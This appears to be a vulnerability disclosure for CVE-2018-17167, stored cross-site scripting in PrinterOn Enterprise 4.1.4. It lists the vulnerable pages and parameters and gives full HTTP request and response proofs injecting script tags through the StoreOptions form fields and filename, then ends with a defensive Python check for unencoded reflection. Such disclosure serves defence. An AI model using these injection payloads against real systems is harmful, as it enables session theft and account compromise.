CVE-2018-17167-XSS-PrinterON

PrinterOn Enterprise 4.1.4 suffers from multiple authenticated stored XSS vulnerabilities via the (1) "Machine Host Name" or "Server Serial Number" field in the clustering configuration, (2) "name" field in the Edit Group configuration, (3) "Rule Name" field in the Access Control configuration, (4) "Service Name" in the Service Configuration, or (5) First Name or Last Name field in the Edit Account configuration.

| Application | Vulnerable Page URL | Vulnerable Parameters | Type |
| --- | --- | --- | --- |
| PrinterOn Admin v4.1.4 | /clustering/processing/d34b4b74-d9a4-4d41-a6e5-e9e57aa1b39d/edit | serverAddress, serverSerialNumber | Stored |
| PrinterOn Admin v4.1.4 | /users/groups/edit | name | Stored |
| PrinterOn Admin v4.1.4 | /users/accessControl/rule/add | name | Stored |
| PrinterOn Admin v4.1.4 | /cps/36dfadca-d73a-409a-bcd3-174c8bc75ec5/basic/ | serviceName | Stored |
| PrinterOn CPS v4.1.4 | /cps/user/ | firstName, lastName | Stored |
| PrinterOn CPS v4.1.4 | /cps/servlet/StoreOptions | documentURI_uri, documentURI_file (both filename and content) | Self, Stored |

(1) /clustering/processing/d34b4b74-d9a4-4d41-a6e5-e9e57aa1b39d/edit - serverAddress, serverSerialNumber

(2) /users/groups/edit - name

(3) /users/accessControl/rule/add - name

(4) /cps/36dfadca-d73a-409a-bcd3-174c8bc75ec5/basic/ - serviceName

(5) /cps/user/ - firstName, lastName

(6) /cps/servlet/StoreOptions

- documentURI_uri:

Request:
POST /cps/servlet/StoreOptions HTTP/1.1
Host: 172.17.20.183
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.17.20.183/cps/SelectOptions?jobId=561829783
Content-Type: multipart/form-data; boundary=---------------------------95469740417489422911864408348
Content-Length: 3499
Cookie: JSESSIONID=82C1F316328E1701A81C3D508BE22BD0; locale=en_US
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------95469740417489422911864408348
Content-Disposition: form-data; name="redirectUrl"

SelectOptions2
-----------------------------95469740417489422911864408348
Content-Disposition: form-data; name="jobId"

561829783
-----------------------------95469740417489422911864408348
Content-Disposition: form-data; name="documentURI_file"; filename=""
Content-Type: application/octet-stream


-----------------------------95469740417489422911864408348
Content-Disposition: form-data; name="documentURI_uri"

<script>alert("PrinterOn 4.1.4 XSS")</script>
-----------------------------95469740417489422911864408348
Content-Disposition: form-data; name="poCopies"
<--SNIP-->
Response:
HTTP/1.1 200 
Cache-Control: must-revalidate
Cache-Control: max-age=0
Cache-Control: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Content-Length: 6836
Date: Thu, 06 Sep 2018 06:18:26 GMT
Connection: close
Server: PrinterOn
<--SNIP-->
                <div class="col-md-3 text-center">
                    <script>alert("PrinterOn 4.1.4 XSS")</script>
                </div>
            </div>

            <div class="row">
                <div class="col-md-3"></div>
                <div class="col-md-3 text-center">
                    <label class="control-label">Job ID</label>
                </div>
                <div class="col-md-3 text-center">
                    1001236
                </div>
            </div>
        </div>
    </div>

	
</div>
    </body>
</html>

- documentURI_file (content):

Request:
POST /cps/servlet/StoreOptions HTTP/1.1
Host: 172.17.20.183
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.17.20.183/cps/SelectOptions?jobId=561829786
Content-Type: multipart/form-data; boundary=---------------------------8402911309205592381366920078
Content-Length: 3450
Cookie: JSESSIONID=0C0E333C8523D4EBBBB932B109C06387; locale=en_US
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------8402911309205592381366920078
Content-Disposition: form-data; name="redirectUrl"

SelectOptions2
-----------------------------8402911309205592381366920078
Content-Disposition: form-data; name="jobId"

561829786
-----------------------------8402911309205592381366920078
Content-Disposition: form-data; name="documentURI_file"; 
Content-Type: text/plain

<script>alert("PrinterON 4.1.4 XSS2")</script>
-----------------------------8402911309205592381366920078
Content-Disposition: form-data; name="documentURI_uri"
<--SNIP-->
Response:
HTTP/1.1 200 
<--SNIP-->
Content-Length: 6837
Date: Thu, 06 Sep 2018 06:47:14 GMT
Connection: close
Server: PrinterOn

<--SNIP-->

 <div class="row">
                <div class="col-md-3"></div>
                <div class="col-md-3 text-center">
                    <label>Document</label>
                </div>
                <div class="col-md-3 text-center">
                    <script>alert("PrinterON 4.1.4 XSS2")</script>
                </div>
            </div>

            <div class="row">
                <div class="col-md-3"></div>
                <div class="col-md-3 text-center">
                    <label class="control-label">Job ID</label>
                </div>
                <div class="col-md-3 text-center">
                    1001248
                </div>
            </div>
        </div>
    </div>

	
</div>
    </body>
</html>

- documentURI_file (filename):

Request:
POST /cps/servlet/StoreOptions HTTP/1.1
Host: 172.17.20.183
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.17.20.183/cps/SelectOptions?jobId=561829788
Content-Type: multipart/form-data; boundary=---------------------------48421886014508415371764384321
Content-Length: 3516
Cookie: JSESSIONID=E5B484FB7164D912126E0705CF62604F; locale=en_US
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------48421886014508415371764384321
Content-Disposition: form-data; name="redirectUrl"

SelectOptions2
-----------------------------48421886014508415371764384321
Content-Disposition: form-data; name="jobId"

561829788
-----------------------------48421886014508415371764384321
Content-Disposition: form-data; name="documentURI_file"; filename="<script>alert("PrinterOn 4.1.4 XSS3")</script>"
Content-Type: text/plain

TEST PAGE TEST PAGE TEST PAGE

-----------------------------48421886014508415371764384321
Content-Disposition: form-data; name="documentURI_uri" 
<--SNIP-->
Response:
HTTP/1.1 200 
Cache-Control: must-revalidate
Cache-Control: max-age=0
Cache-Control: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Date: Thu, 06 Sep 2018 07:26:37 GMT
Connection: close
Server: PrinterOn
Content-Length: 9537
<--SNIP-->
 <div class="row">
                              <div class="col-md-3"></div>
                              <div class="col-md-3 text-center">
                                  <label>Document</label>
                              </div>
                              <div class="col-md-3 text-center">
                                  <script>alert("PrinterOn 4.1.4 XSS3")</script>
                              </div>
                          </div>
                          <div class="row">
                              <div class="col-md-3"></div>
                              <div class="col-md-3 text-center">
                                  <label class="control-label">Job ID</label>
                              </div>
                              <div class="col-md-3 text-center">
                                  1001256
                              </div>
                          </div>
                          <!-- Closing this will cancel your request -->
                          <div class="row">
                              <div class="col-md-3 text-center">      
                          </div>
                      </div>
                    </div>
                </div>
    </div>
</div><script type="application/javascript" src="/cps/js/SubmitRequest.js"></script>
    </body>
</html>
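
In all three StoreOptions responses above, the submitted value reaches the "Document" cell without HTML encoding. The following is an added example, not code from PrinterOn or from this disclosure: a regression check that parses the client-controlled strings out of a multipart body and reports which fields appear verbatim in the rendered page, with raw and encoded output compared. The request body, the markup probes, `render_row` and the other function names are assumptions made for illustration.

```python
import html
import re

BOUNDARY = "constructed-boundary-0001"
# Constructed body modelled on the StoreOptions form above. Each client-controlled
# input carries a harmless markup probe; none of this is PrinterOn code.
PARTS = [
    ('name="jobId"', "", "561829783"),
    ('name="documentURI_file"; filename="<i>name&1</i>"',
     "Content-Type: text/plain\r\n", "<i>body&2</i>"),
    ('name="documentURI_uri"', "", "<i>uri&3</i>"),
]
BODY = "".join(
    f"--{BOUNDARY}\r\nContent-Disposition: form-data; {disp}\r\n{ctype}\r\n{data}\r\n"
    for disp, ctype, data in PARTS
) + f"--{BOUNDARY}--\r\n"

def submitted_values(body, boundary):
    """Map each form field to the strings the client controls (filename, content)."""
    fields = {}
    for part in body.split("--" + boundary)[1:]:
        if part.startswith("--"):  # closing delimiter
            break
        head, _, data = part.strip("\r\n").partition("\r\n\r\n")
        name = re.search(r'\bname="([^"]*)"', head).group(1)
        filename = re.search(r'filename="(.*)"', head)
        fields[name] = ([filename.group(1)] if filename else []) + [data]
    return fields

def render_row(label, value, encode):
    """Hypothetical stand-in for the confirmation row; encode=False echoes raw input."""
    cell = html.escape(value, quote=True) if encode else value
    return (f'<div class="row"><div class="col-md-3 text-center"><label>{label}</label>'
            f'</div><div class="col-md-3 text-center">{cell}</div></div>')

def unencoded_reflections(fields, page):
    """Fields whose markup-bearing value appears verbatim (unescaped) in the page."""
    return sorted({name for name, vals in fields.items()
                   for v in vals if re.search(r'[<>"\'&]', v) and v in page})

def audit(encode):
    """Render every submitted value, then list the fields reflected without encoding."""
    fields = submitted_values(BODY, BOUNDARY)
    page = "".join(render_row(n, v, encode) for n, vals in fields.items() for v in vals)
    return unencoded_reflections(fields, page)

if __name__ == "__main__":
    print("raw output:    ", audit(encode=False))
    print("encoded output:", audit(encode=True))
```

The filename is treated as client-controlled input alongside the file content and the URI field, since all three are echoed into the same cell.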